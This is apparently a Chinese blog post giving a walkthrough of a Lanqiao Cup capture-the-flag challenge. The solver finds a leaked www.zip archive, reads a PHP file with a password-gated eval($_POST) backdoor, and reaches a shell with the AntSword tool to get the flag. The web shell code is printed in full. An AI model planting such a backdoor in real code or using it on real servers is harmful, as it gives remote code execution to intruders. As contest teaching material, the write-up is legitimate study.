当前位置: 首页 > news >正文

蓝桥杯-网络安全比赛题目-遗漏的压缩包

小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击“下发赛题”后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)

题目

  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
    1337.php
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){eval($_POST['1337']);
}

可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’
HACKBOOK
输入密码,通过蚁剑进入SHELL
shell

连接成功
进入根目录,找到flag
flag
flag text
成功夺旗!

http://www.lryc.cn/news/478743.html

相关文章:

  • ES海量数据插入如何优化性能?
  • 遥控救生圈,水上应急救援的新革命_鼎跃安全
  • 【flask开启进程,前端内容图片化并转pdf-会议签到补充】
  • Docker在CentOS上的安装与配置
  • 【笔记】开关电源变压器设计 - 工作磁通的选择原则
  • 【VScode】如何在VSCode中配置Python开发环境:从零开始的完整指南
  • Copy From 勇哥的机器视觉实验项目
  • 在IDEA中使用Git
  • 分布式锁(防止同时操作同一条数据)实现分析
  • 【已解决,含泪总结】Ubuntu18.04下非root用户Anaconda3卸载重装,conda install终于不再报错
  • 大语言模型(LLM)量化基础知识(一)
  • hadoop面试题
  • mysql 安装 windows
  • 24下软考中级网络工程师考前必背22页
  • Java类和对象(下篇)
  • k8s图形化显示(KRM)
  • apache poi 实现下拉框联动校验
  • 【canal 中间件】canal 实时监听 binlog
  • JVM垃圾收集算法、对应收集器和选择建议
  • 如何在算家云搭建Aatrox-Bert-VITS2(音频生成)
  • ceph灾备之cephfs snapshot mirror和rsync对比
  • 【工具分享】Plutocrypt勒索病毒解密工具
  • IDEA启动提示Downloading pre-built shared indexes
  • [HCTF 2018]WarmUp 1--详细解析
  • 软考教材重点内容 信息安全工程师 第1章 网络信息安全概述
  • TOSHIBA 74VHC00FT COMS汽车、工业企业的选择
  • 【Android】使用productFlavors构建多个变体
  • ubuntu 22.04 防火墙 ufw
  • MySQL压缩版安装详细图解
  • elementui中的新增弹窗在新增数据成功后再新增 发现数据无法清除解决方法